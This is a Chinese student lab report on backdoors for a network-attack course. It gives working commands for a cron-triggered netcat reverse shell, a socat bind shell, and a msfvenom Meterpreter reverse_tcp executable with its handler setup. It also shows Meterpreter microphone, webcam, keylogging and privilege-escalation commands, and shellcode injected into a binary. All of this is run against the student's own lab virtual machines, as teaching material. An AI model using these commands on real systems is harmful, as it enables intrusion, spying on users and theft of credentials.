2018-2019-2 20165315《网络对抗技术》Exp2 后门原理与实践

2018-2019-2 20165315《网络对抗技术》Exp2 后门原理与实践

1、实验任务

• 使用netcat获取主机操做Shell，cron启动
• 使用socat获取主机操做Shell, 任务计划启动
• 使用MSF meterpreter（或其余软件）生成可执行文件，利用ncat或socat传送到主机并运行获取主机Shell
• 使用MSF meterpreter（或其余软件）生成获取目标主机音频、摄像头、击键记录等内容，并尝试提权
• 可选加份内容：使用MSF生成shellcode,注入到实践1中的pwn1中，获取反弹链接Shell

2、实验步骤

一、使用netcat获取主机操做Shell，cron启动

在此任务中，我将kali做为受害机，MacOS系统做为攻击机

• 在Mac终端中监听5315号端口，命令为nc -l 5315

• 编辑一条定时任务，命令为crontab -e，选择vim.basic编辑器

• 在编辑器中的最后一行加上06 * * * * /bin/netcat 10.0.0.165 5303 -e /bin/sh，使每一个小时的第6分钟反向链接Mac主机的5315端口（我作实验正好是第5分钟，命令中IP地址为攻击机IP）

• 1分钟后，3点06分时，攻击机获取了受害机的shell操做权，攻击成功

二、使用socat获取主机操做Shell, 任务计划启动

socat简介：

socat是一个多功能的网络工具，名字来由是“ Socket CAT”，能够看做是netcat的N倍增强版。

socat是一个两个独立数据通道之间的双向数据传输的继电器。这些数据通道包含文件、管道、设备（终端或调制解调器等）、插座（Unix，IP4，IP6 - raw，UDP，TCP）、SSL、SOCKS4客户端或代理CONNECT。socat支持广播和多播、抽象Unix sockets、Linux tun/tap、GNU readline 和 PTY。它提供了分叉、记录和进程间通讯的不一样模式。

socat的主要特色就是在两个数据流之间创建通道；且支持众多协议和连接方式：ip,tcp,udp,ipv6,pipe,exec,system,open,proxy,openssl,socket等。

因为个人主机是MacOS系统，故没有按照老师的指导方法进行操做，具体操做参考自该博客。

此项任务中我将MacOS系统做为受害机，Kali做为攻击机。

• 在Mac命令行中下载socat，指令为brew install socat

• 在受害机上执行socat tcp-l:5315 system:bash,pty,stderr指令，进行端口转发

• 在攻击机中执行socat - tcp:10.1.1.165:5315，获取受害机shell操做权（命令中IP地址为受害机IP）

三、使用MSF meterpreter生成可执行文件，利用ncat传送到主机并运行获取主机Shell

Meterpreter简介：

Meterpreter是Metasploit框架中的一个扩展模块，做为溢出成功之后的攻击载荷使用，攻击载荷在溢出攻击成功之后给咱们返回一个控制通道。使用它做为攻击载荷可以得到目标系统的一个Meterpreter shell的连接。

Meterpreter shell做为渗透模块有不少有用的功能，好比打开shell、获得用户密码、上传下载远程主机的文件、运行cmd.exe、捕捉屏幕、获得远程控制权、捕获按键信息等等。另外Meterpreter可以躲避入侵检测系统。在远程主机上隐藏本身,它不改变系统硬盘中的文件,所以HIDS[基于主机的入侵检测系统]很难对它作出响应。Meterpreter还能够简化任务建立多个会话。能够来利用这些会话进行渗透。

因为MacOS系统没法执行exe文件，故此任务我仍是用了win7的虚拟机，按照老师的指导方法进行操做。

此项任务中我将Win7系统做为受害机，Kali做为攻击机。

• 在Kali上执行指令msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.196.188 LPORT=5315 -f exe > 20165315_backdoor.exe，生成后门程序“20155312_backdoor.exe”（命令中IP地址为攻击机IP）

• 让受害机进入接收文件模式，指令为ncat -l 5315 > 20165315_backdoor.exe

• 将生成的后门程序传送到Windows主机上，指令为nc 10.1.1.143 5315 < 20165315_backdoor.exe（命令中IP地址为受害机IP）

• 在Kali中再打开一个终端，使用msfconsole指令进入msf控制台

• 依次输入以下指令进行配置：

# use exploit/multi/handler
//使用监听模块，设置payload

# set payload windows/meterpreter/reverse_tcp
//使用和生成后门程序时相同的payload

# set LHOST 192.168.192.188
//这里用的是LinuxIP，和生成后门程序时指定的IP相同

# set LPORT 5315
//一样要使用相同的端口

• 输入exploit开始监听

• 在win7主机中运行后门程序，攻击机获取受害机Shell，指令为20165315_backdoor.exe

四、使用MSF meterpreter生成获取目标主机音频、摄像头、击键记录等内容，并尝试提权

• 使用record_mic指令能够截获一段音频

在当前目录下可找到存储的音频文件：

• 使用webcam_snap指令可使用摄像头进行拍照

因为个人虚拟机是Win7系统，没有摄像功能，而主机又是MacOS系统，找了半天都没找到怎么开启摄像机...可是这个指令我已经明白如何使用，没有截图但愿老师谅解～

• 使用keyscan_start指令开始记录下击键的过程，使用keyscan_dump指令读取击键的记录

• 先使用getuid指令查看当前用户，使用getsystem指令进行提权，因为是Win7系统，提权失败

五、使用MSF生成shellcode,注入到实践1中的pwn1中，获取反弹链接Shell

这一项任务还在尝试，若是作出来会有后期更新～

经过后期的尝试与参考这个博客，任务完成过程以下～

此项任务中我将Kali的终端1做为受害机，终端2做为攻击机（这是因为Windows系统没法执行pwn1文件）。

• 经过MSF生成shellcode，并注入20165315pwn1，生成20165315_msf后门程序，指令为msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.196.190 LPORT=5315 -x /root/20165315/exp1/20165315pwn1 -f elf > 20165315_msf

• 使用msfconsole控制台

• 在另外一个终端中，运行生成的20165315_msf文件，会发现控制台已获取该终端shell权限

3、实验中遇到的问题

在作任务三的时候，我原本想像任务二同样，在网上找一下针对mac的攻击教程，可是在运行到msf控制台时，发现执行exploit指令时，因为macOS系统没法执行exe文件，致使kali没法进行攻击（这说明macOS真的安全）

后来我查到一个博客，能够用msfvenom -p linux/x86/meterpreter/reverse_tcp lhost lport -f elf -o shell指令，虽然文件是生成了，可是...mac仍是不能运行这个文件！太安全了致使实验作不了很难受了QAQ

解决过程：
大丈夫能屈能伸，我...最后仍是选择了Win7虚拟机...若是有大神知道怎么攻击Mac麻烦在评论里指导我一下，蟹蟹！

4、实验总结

一、基础问题回答

(1)例举你能想到的一个后门进入到你系统中的可能方式？

当朋友的QQ号被盗后，攻击者借QQ号向我发送自动下载恶意后门程序的连接，假称这是投票连接，若是我没有防范意识，直接点击连接，就会自动下载恶意程序，对电脑的安全形成很大的影响。

(2)例举你知道的后门如何启动起来(win及linux)的方式？

Windows可使用任务计划，或者当在运行一个含有绑定后门程序的软件时，后门就能够被开启；linux可使用cron定时触发，也能够经过对正常软件的绑定注入shellcode达到开启后门的目的

(3)Meterpreter有哪些给你映像深入的功能？

能够经过反向连接，获取全部执行了含后门的可执行文件的主机shell操做权，从而获得用户密码、上传下载远程主机的文件、运行cmd.exe、捕捉屏幕、获得远程控制权、捕获按键信息等等。

(4)如何发现本身有系统有没有被安装后门？

查看开机自启动项、任务计划程序中是否有可疑程序；安装专门的杀毒软件，实时防御；查看本机端口，判断是否有被异常开放的端口等等。

二、实验体会

此次实验趣味性很强，经过学习老师教程以及学长学姐的博客，基本都可以完成实验。在此次实验中，我学会了利用后门程序对主机进行注入攻击，学会了使用netcat、socat、meterpreter等，虽然内容简单，但我已经基本了解后门的基本原理。在从此的学习中，我将会进一步深刻研究后门的各类理论知识。

本次实验也让我更加了解了一些网络攻击的手段，增强了网络安全防范意识。